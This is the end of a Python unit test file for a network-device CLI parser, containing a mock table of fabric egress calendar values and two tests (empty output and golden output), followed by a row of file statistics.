29 | LOW | 32 | 32 | 35 | 37 | 1010003 | 433417500 | 1050112 | 1050112
30 | LOW | 32 | 32 | 76 | 78 | 10100011 | 433417500 | 10500096 | 10500096
31 | LOW | 32 | 32 | 39 | 41 | 10100011 | 433417500 | 10500096 | 10500096
32 | LOW | 32 | 32 | 78 | 80 | 10100011 | 433417500 | 10500096 | 10500096
33 | LOW | 32 | 32 | 33 | 35 | 1010003 | 433417500 | 1050112 | 1050112
34 | LOW | 32 | 32 | 38 | 40 | 1010003 | 433417500 | 1050112 | 1050112
35 | LOW | 32 | 32 | 37 | 39 | 1010003 | 433417500 | 1050112 | 1050112
36 | LOW | 32 | 32 | 47 | 49 | 10100011 | 433417500 | 10500096 | 10500096
37 | LOW | 32 | 32 | 51 | 53 | 10100011 | 433417500 | 10500096 | 10500096
38 | LOW | 32 | 32 | 40 | 42 | 10100011 | 433417500 | 10500096 | 10500096
39 | LOW | 32 | 32 | 79 | 81 | 10100011 | 433417500 | 10500096 | 10500096
40 | LOW | 32 | 32 | 77 | 79 | 10100011 | 433417500 | 10500096 | 10500096
41 | LOW | 32 | 32 | 41 | 43 | 10100011 | 433417500 | 10500096 | 10500096
42 | LOW | 32 | 32 | 50 | 52 | 10100011 | 433417500 | 10500096 | 10500096
43 | LOW | 32 | 32 | 42 | 44 | 10100011 | 433417500 | 10500096 | 10500096
44 | LOW | 32 | 32 | 80 | 82 | 10100011 | 433417500 | 10500096 | 10500096
45 | LOW | 32 | 32 | 43 | 45 | 10100011 | 433417500 | 10500096 | 10500096
46 | LOW | 32 | 32 | 44 | 46 | 10100011 | 433417500 | 10500096 | 10500096
47 | LOW | 32 | 32 | 45 | 47 | 10100011 | 433417500 | 10500096 | 10500096
48 | LOW | 32 | 32 | 46 | 48 | 10100011 | 433417500 | 10500096 | 10500096
49 | LOW | 32 | 32 | 53 | 55 | 10100011 | 433417500 | 10500096 | 10500096
50 | LOW | 32 | 32 | 73 | 75 | 10100011 | 433417500 | 10500096 | 10500096
51 | LOW | 32 | 32 | 71 | 73 | 10100011 | 433417500 | 10500096 | 10500096
52 | LOW | 32 | 32 | 70 | 72 | 10100011 | 433417500 | 10500096 | 10500096
53 | LOW | 32 | 32 | 69 | 71 | 10100011 | 433417500 | 10500096 | 10500096
54 | LOW | 32 | 32 | 67 | 69 | 10100011 | 433417500 | 10500096 | 10500096
55 | LOW | 32 | 32 | 68 | 70 | 10100011 | 433417500 | 10500096 | 10500096
56 | LOW | 32 | 32 | 66 | 68 | 10100011 | 433417500 | 10500096 | 10500096
57 | LOW | 32 | 32 | 74 | 76 | 10100011 | 433417500 | 10500096 | 10500096
58 | LOW | 32 | 32 | 54 | 56 | 10100011 | 433417500 | 10500096 | 10500096
59 | LOW | 32 | 32 | 72 | 74 | 10100011 | 433417500 | 10500096 | 10500096
60 | LOW | 32 | 32 | 75 | 77 | 10100011 | 433417500 | 10500096 | 10500096
61 | LOW | 32 | 32 | 52 | 54 | 10100011 | 433417500 | 10500096 | 10500096
62 | LOW | 32 | 32 | 62 | 64 | 10100011 | 433417500 | 10500096 | 10500096
63 | LOW | 32 | 32 | 64 | 66 | 10100011 | 433417500 | 10500096 | 10500096
64 | LOW | 32 | 32 | 65 | 67 | 10100011 | 433417500 | 10500096 | 10500096
65 | LOW | 32 | 32 | 60 | 62 | 10100011 | 433417500 | 10500096 | 10500096
66 | LOW | 32 | 32 | 59 | 61 | 10100011 | 433417500 | 10500096 | 10500096
67 | LOW | 32 | 32 | 61 | 63 | 10100011 | 433417500 | 10500096 | 10500096
68 | LOW | 32 | 32 | 63 | 65 | 10100011 | 433417500 | 10500096 | 10500096
69 | LOW | 32 | 32 | 55 | 57 | 10100011 | 433417500 | 10500096 | 10500096
70 | LOW | 32 | 32 | 58 | 60 | 10100011 | 433417500 | 10500096 | 10500096
71 | LOW | 32 | 32 | 57 | 59 | 10100011 | 433417500 | 10500096 | 10500096
72 | LOW | 32 | 32 | 56 | 58 | 10100011 | 433417500 | 10500096 | 10500096
128 | LOW | 255 | 5 | 31 | 5 | 1010113 | 159997500 | 5184078 | 161280000
129 | LOW | 255 | 4 | 31 | 4 | 1010033 | 323190000 | 5180956 | 339536840
130 | LOW | 255 | 5 | 31 | 5 | 1010113 | 159997500 | 5184078 | 161280000
131 | LOW | 255 | 4 | 31 | 4 | 1010033 | 323190000 | 5180956 | 339536840
132 | LOW | 255 | 5 | 31 | 5 | 161600009 | 159997500 | 165890478 | 161280000
133 | LOW | 255 | 4 | 31 | 4 | 161600021 | 323190000 | 165790561 | 339536840
134 | LOW | 255 | 5 | 31 | 5 | 1010113 | 159997500 | 5184078 | 161280000
135 | LOW | 255 | 4 | 31 | 4 | 1010033 | 323190000 | 5180956 | 339536840
136 | LOW | 255 | 5 | 31 | 5 | 161600009 | 159997500 | 165890478 | 161280000
137 | LOW | 255 | 4 | 31 | 4 | 161600021 | 323190000 | 165790561 | 339536840
138 | LOW | 255 | 5 | 31 | 5 | 161600009 | 159997500 | 165890478 | 161280000
139 | LOW | 255 | 4 | 31 | 4 | 161600021 | 323190000 | 165790561 | 339536840
140 | LOW | 255 | 5 | 31 | 5 | 1010113 | 159997500 | 5184078 | 161280000
141 | LOW | 255 | 4 | 31 | 4 | 1010033 | 323190000 | 5180956 | 339536840
142 | LOW | 255 | 5 | 31 | 5 | 161600009 | 159997500 | 165890478 | 161280000
143 | LOW | 255 | 4 | 31 | 4 | 161600021 | 323190000 | 165790561 | 339536840
144 | LOW | 255 | 5 | 31 | 5 | 161600009 | 159997500 | 165890478 | 161280000
145 | LOW | 255 | 4 | 31 | 4 | 161600021 | 323190000 | 165790561 | 339536840
146 | LOW | 255 | 5 | 31 | 5 | 161600009 | 159997500 | 165890478 | 161280000
147 | LOW | 255 | 4 | 31 | 4 | 161600021 | 323190000 | 165790561 | 339536840
148 | LOW | 255 | 5 | 31 | 5 | 10100009 | 159997500 | 10368155 | 161280000
149 | LOW | 255 | 4 | 31 | 4 | 10100089 | 323190000 | 10361911 | 339536840
208 | LOW | 255 | 4 | 28 | 4 | 10100000 | 990000 | 10500000 | 1050000
232 | LOW | 32 | 32 | 30 | 32 | 30300003 | 433417500 | 31500416 | 31500416
233 | LOW | 32 | 32 | 30 | 32 | 1010011 | 609052500 | 1050112 | 1050112
235 | LOW | 255 | 5 | 31 | 5 | 20200017 | 159997500 | 20736310 | 161280000
240 | LOW | 32 | 32 | 29 | 33 | 101000003 | 433417500 | 105004160 | 105004160
241 | LOW | 32 | 32 | 29 | 33 | 1010011 | 609052500 | 1050112 | 1050112
246 | LOW | 255 | 5 | 31 | 5 | 25250083 | 159997500 | 25920388 | 161280000
247 | LOW | 255 | 4 | 31 | 4 | 25250105 | 323190000 | 25904776 | 339536840
248 | LOW | 255 | 5 | 31 | 5 | 10100009 | 159997500 | 10368155 | 161280000
249 | LOW | 255 | 4 | 31 | 4 | 10100089 | 323190000 | 10361911 | 339536840
250 | LOW | 255 | 5 | 31 | 5 | 161600009 | 159997500 | 165890478 | 161280000
251 | LOW | 255 | 4 | 31 | 4 | 161600021 | 323190000 | 165790561 | 339536840
252 | LOW | 255 | 5 | 31 | 5 | 1120 | 159997500 | 10368155 | 161280000
253 | LOW | 255 | 4 | 28 | 4 | 101000000 | 990000 | 350000 | 1050000
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowControllersFiaDiagshellDiagEgrCalendarsLocation(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse(diagshell=0,
location='all')
def test_golden1(self):
self.device = Mock(**self.golden_output1)
obj = ShowControllersFiaDiagshellDiagEgrCalendarsLocation(device=self.device)
parsed_output = obj.parse(diagshell=0,
location='all')
self.assertEqual(parsed_output, self.golden_parsed_output1)
if __name__ == '__main__':
unittest.main()
| 45.369795 | 132 | 0.348668 | 6,250 | 81,711 | 4.32784 | 0.07456 | 0.034012 | 0.030611 | 0.036452 | 0.809494 | 0.786055 | 0.769936 | 0.745758 | 0.720064 | 0.665459 | 0 | 0.252388 | 0.547637 | 81,711 | 1,800 | 133 | 45.395 | 0.479398 | 0.01449 | 0 | 0.571513 | 0 | 0.006501 | 0.43778 | 0.010825 | 0 | 0 | 0.001988 | 0 | 0.006501 | 1 | 0.006501 | false | 0 | 0.002364 | 0 | 0.024232 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.